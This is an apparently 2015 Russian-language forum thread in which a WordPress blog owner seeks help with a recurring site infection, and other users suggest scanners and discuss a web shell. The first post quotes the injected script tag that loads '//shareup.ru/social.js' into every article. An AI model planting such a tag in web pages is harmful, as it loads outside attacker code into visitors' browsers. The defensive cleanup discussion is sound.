Прошу помощи в поиске дыры

Bahus

Активный пользователь
Сообщения
6
Реакции
0
Баллы
81
Доброго времени суток. Не так давно нашел в коде статей на блоге (cms wordpress) dendrblog.ru такую муть
Код:
<script src="//shareup.ru/social.js" type="text/javascript"></script>
Так же хостер обматерил меня за вирус на сайте. После проверки был найден PHP.BlacoleRef. Все вылечили. Левый скрипт вычищен из статей.
Прошла неделя. Вирусов больше не найдено, а скрипт снова во всех статьях. Откуда эта гнида лезет не пойму. Так же не понятно, что первично вирус, загружающий скрипт или скрипт, загружающий вирус?
 

SNS-amigo

SNS System Watch Freelance reporter
Сообщения
5,071
Реакции
8,132
Баллы
803
Откуда эта гнида лезет не пойму. Так же не понятно, что первично вирус, загружающий скрипт или скрипт, загружающий вирус?
Bahus, первично - уязвимости в CMS WordPress, через которую всё это позволяется, см. вот эту статью.
 

Bahus

Активный пользователь
Сообщения
6
Реакции
0
Баллы
81
У меня нет WP-Super-Cache
 

regist

гоняюсь за туманом
Ассоциация VN/VIP
VIP
Разработчик
Сообщения
12,397
Реакции
5,988
Баллы
998
У меня нет WP-Super-Cache
Bahus, это просто реклама была, разумеется та статься к вашему взлому никакого отношения не имеет, кроме того что там тоже про wordpress. Думаю движок у вас обновлён до последней версии?
По вопросу, скрипт внутри тела страниц вторичен и является следствием заражения.
 

Bahus

Активный пользователь
Сообщения
6
Реакции
0
Баллы
81
Все постоянно обновляется до последних версий сразу же после выхода.
 

regist

гоняюсь за туманом
Ассоциация VN/VIP
VIP
Разработчик
Сообщения
12,397
Реакции
5,988
Баллы
998
После проверки был найден PHP.BlacoleRef. Все вылечили. Левый скрипт вычищен из статей.
А чем проверяли? Вычистили только этот скрипт (может там ещё зараза осталась, которую не вычистили)? Возможно глупый вопрос, но Айболитом или Manul-ом проверяли?
+ у вас на сайте есть такие ссылки
Код:
http://goo.gl/6UnImm
http://goo.gl/Sqz26j
они вам знакомы?
 

Сергій

Разработчик
Сообщения
412
Реакции
221
Баллы
218
httр://gоо.gl/ - я ,кстати, слышал, что это боевой вирус (по новостям говорили)
 
Последнее редактирование:

SNS-amigo

SNS System Watch Freelance reporter
Сообщения
5,071
Реакции
8,132
Баллы
803
Bahus, у Яндекса в этом году появился Манул, мы его тут представляли летом.
Если Ваш хостер и Вирусдай позволяют, то воспользуйтесь. Как пользоваться, там указано.
Указанный вами скрипт атакует сайты на основе ВордПресса уже примерно полгода. Сведения из новостей здесь не помогут. Инъекция непростая.
 
Последнее редактирование:

regist

гоняюсь за туманом
Ассоциация VN/VIP
VIP
Разработчик
Сообщения
12,397
Реакции
5,988
Баллы
998
httр://gоо.gl/ - я ,кстати, слышал, что это боевой вирус (по новостям говорили)
Это просто сервис сокращения ссылок. Для чего используют и где это уже другой вопрос.
К примеру
Код:
http://goo.gl/swAkXv
- это ссылка на эту страницу.
 

Bahus

Активный пользователь
Сообщения
6
Реакции
0
Баллы
81
Появился левый файл с шелом. Хотелось бы его раскодировать, чтобы понять, звенья одной цепи или два независимых взлома.
Код тут
 
Последнее редактирование:

regist

гоняюсь за туманом
Ассоциация VN/VIP
VIP
Разработчик
Сообщения
12,397
Реакции
5,988
Баллы
998
Хотелось бы его раскодировать
без знания, что передают в $_POST['g__g_'] или тут $_COOKIE['g__g_'] скорее всего расшифровать не получиться.
И добавлю отчёт о проверке на вирустотал Antivirus scan for 20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239 at 2015-11-19 06:23:34 UTC - VirusTotal
 
Сверху Снизу